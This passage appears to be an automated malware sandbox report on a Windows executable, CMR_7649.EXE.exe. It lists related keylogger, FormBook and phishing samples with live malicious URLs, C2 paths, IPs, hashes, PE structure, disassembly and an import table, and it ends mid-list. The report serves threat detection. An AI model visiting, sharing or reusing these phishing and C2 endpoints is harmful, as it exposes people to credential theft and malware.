                                  https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                    SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                        inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              188.114.96.3ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                              • www.chinaen.org/zi4g/
                                              http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                              • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                              Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • www.444317.com/
                                              Sept order.docGet hashmaliciousFormBookBrowse
                                              • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                              1e#U0414.exeGet hashmaliciousLokibotBrowse
                                              • dddotx.shop/Mine/PWS/fre.php
                                              https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                              • hdcy.emcl00.com/qRCfs/
                                              PO23100072.exeGet hashmaliciousFormBookBrowse
                                              • www.cc101.pro/ttiz/
                                              RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                              • www.1win-moldovia.fun/1g7m/
                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                              • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                                              Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                                              • www.chinaen.org/zi4g/
                                              193.122.130.0Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              checkip.dyndns.comRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.130.0
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              api.telegram.orgPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUPayment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                              • 149.154.167.99
                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              https://telegram-privatefree.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              https://live-prons-sex.pages.dev/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              CLOUDFLARENETUSContract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                              • 162.159.61.3
                                              http://linksapp.top:443Get hashmaliciousUnknownBrowse
                                              • 104.21.74.63
                                              RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              p37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 104.21.37.97
                                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.208.139
                                              HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.17.90
                                              gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.70.136
                                              a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.58.182
                                              iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 104.21.37.97
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              ORACLE-BMC-31898USRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              http://ec44d1ee.freyy.pages.dev/Zimbra%20Web%20Client%20Sign%20In/Get hashmaliciousUnknownBrowse
                                              • 147.154.16.196
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.130.0
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.96.3
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              3b5074b1b5d032e5620f69f9f700ff0eRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                              • 149.154.167.220
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              450230549.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              450230549.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              https://qwekorqw-eqo.top/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              https://qwoms-dei3.top/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\savager

                                              Download File
                                              Process:C:\Users\user\Desktop\CMR_7649.EXE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):274944
                                              Entropy (8bit):6.892827622047486
                                              Encrypted:false
                                              SSDEEP:3072:sTExkzMmYemkI0epKiMWCJM/Nl0Xhbg9BsYUSmfUjHL9Yq9wBdYwINfgtsvqbmoD:sTFMmYemkIRMxm8KqSZ6kDr03PGb1I
                                              MD5:364C867D1C086BE9FC31AC758C7C5107
                                              SHA1:3E2B315AB64DBB7F7E55515DA4292AB7C9E99CF4
                                              SHA-256:B9CBE37285665454C83BE9D9636921A1F1DC2E27E70F988ACE075EA2BA6458F0
                                              SHA-512:8F92C803BC991237002B5FCEB655C14A388FE298EA90200796BC5D558D8007F08D103AFF2ED15FE9C80016D6FB6E6C08D84022597B0F872EE291E051AE735E4C
                                              Malicious:false
                                              Reputation:low
                                              Preview:...8ZWMQINSK..KB.UDEDU6E.DYOLQIKD8YWMQMNSKBQKBJUDEDU6ECDYOLQ.KD8WH._M.Z.c.J..t.--&.51+>=-<i(%V789q/+s97?k+$u...u[*'!wBA[mKD8YWMQ..SK.PHB...#DU6ECDYO.QKJO9.WMMINS_BQKBJUJ.@U6eCDY.HQIK.8YwMQMLSKFQKBJUDE@U6ECDYOL.MKD:YWMQMNQK..KBZUDUDU6ESDY_LQIKD8IWMQMNSKBQKB.l@E.U6EC.]O[AIKD8YWMQMNSKBQKBJUD%@U:ECDYOLQIKD8YWMQMNSKBQKBJUDEDU6ECDYOLQIKD8YWMQMNSKBQKbJULEDU6ECDYOLQAkD8.WMQMNSKBQKBd!!=0U6EW^]OLqIKD$]WMSMNSKBQKBJUDEDU.EC$w=?#*KD8NGMQM.WKBCKBJK@EDU6ECDYOLQIK.8Y.c#("<(BQGBJUD%@U6GCDY.HQIKD8YWMQMNSK.QK.JUDEDU6ECDYOLQIK..]WMQMN.KBQIBOU..FU..BDZOLQ.KD>..OQ.NSKBQKBJUDEDU6ECDYOLQIKD8YWMQMNSKBQKBJUDEDU.8.K...8:.8YWMQMOQHFWCJJUDEDU6E=DYO.QIK.8YWzQMNvKBQ&BJU`EDUHECD'OLQ-KD8+WMQ,NSK.QKB%UDE*U6E=DYORSakD8S}kQOfrKB[Kh.&fED_.DCD]<oQIA.:YWI"iNSA.RKBN&aED_.ACD]<jQIA.=YWI{.NP.TWKBQ:}ED_6F.Q_OLJcmD:qmMQGNymBR.WLUD^nw6G.MYOH{.8Y8YQe.MNY?KQK@._DE@.(Gk.YOF{k5O8YSfQgl-GBQOiJ.f;IU6AhDsQN.DKD<su3_MNW`B{i<EUDAoU.[A.VOLUci:(YWIzMdq5SQKFaUng:G6EGoYen/ZKD<rWgs3ZSKFzKhh+QEDQ.Eif'YLQM`D.{)ZQMJxKhs5ZJU@nD.(G.\YOH{Oa&8+.XQ=M

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.467538006372339
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CMR_7649.EXE.exe
                                              File size:1'237'203 bytes
                                              MD5:b686bc08d9ec68d1746859235ecb70fd
                                              SHA1:bd5a42f4351873517aee319c3abec53569bf1be9
                                              SHA256:4c19b3b4b58d6dac32e4b968d7e5a9fa6d30146e0680bcef4320a5079f5ed2e9
                                              SHA512:f54f69fa8334312fd97759daa1a796669e281a5f391d876e0ee19cbb8446a39257e19b4f4eea6b1a73e4910148af00a5fb8188b9e2714f44cd8759998be864be
                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCN3mVUjjf/kwcacDzste+ODgejEJMv:7JZoQrbTFZY1iaCNrfcwFteBznv
                                              TLSH:0A45E121F5D69036C2B323B19E7EF76A963D69360326D19B37C82D321E605416B3A733
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                              File Icon

                                              Icon Hash:1733312925935517

                                              Static PE Info

                                              General

                                              Entrypoint:0x4165c1
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                              Entrypoint Preview

                                              Instruction
                                              call 00007F81810091CBh
                                              jmp 00007F818100003Eh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              push edi
                                              push esi
                                              mov esi, dword ptr [ebp+0Ch]
                                              mov ecx, dword ptr [ebp+10h]
                                              mov edi, dword ptr [ebp+08h]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F81810001BAh
                                              cmp edi, eax
                                              jc 00007F8181000356h
                                              cmp ecx, 00000080h
                                              jc 00007F81810001CEh
                                              cmp dword ptr [004A9724h], 00000000h
                                              je 00007F81810001C5h
                                              push edi
                                              push esi
                                              and edi, 0Fh
                                              and esi, 0Fh
                                              cmp edi, esi
                                              pop esi
                                              pop edi
                                              jne 00007F81810001B7h
                                              jmp 00007F8181000592h
                                              test edi, 00000003h
                                              jne 00007F81810001C6h
                                              shr ecx, 02h
                                              and edx, 03h
                                              cmp ecx, 08h
                                              jc 00007F81810001DBh
                                              rep movsd
                                              jmp dword ptr [00416740h+edx*4]
                                              mov eax, edi
                                              mov edx, 00000003h
                                              sub ecx, 04h
                                              jc 00007F81810001BEh
                                              and eax, 03h
                                              add ecx, eax
                                              jmp dword ptr [00416654h+eax*4]
                                              jmp dword ptr [00416750h+ecx*4]
                                              nop
                                              jmp dword ptr [004166D4h+ecx*4]
                                              nop
                                              inc cx
                                              add byte ptr [eax-4BFFBE9Ah], dl
                                              inc cx
                                              add byte ptr [ebx], ah
                                              ror dword ptr [edx-75F877FAh], 1
                                              inc esi
                                              add dword ptr [eax+468A0147h], ecx
                                              add al, cl
                                              jmp 00007F81834789B7h
                                              add esi, 03h
                                              add edi, 03h
                                              cmp ecx, 08h
                                              jc 00007F818100017Eh
                                              rep movsd
                                              jmp dword ptr [00000000h+edx*4]

                                              Rich Headers

                                              Programming Language:
                                              • [ C ] VS2010 SP1 build 40219
                                              • [C++] VS2010 SP1 build 40219
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                              Imports

                                              DLLImport
                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, 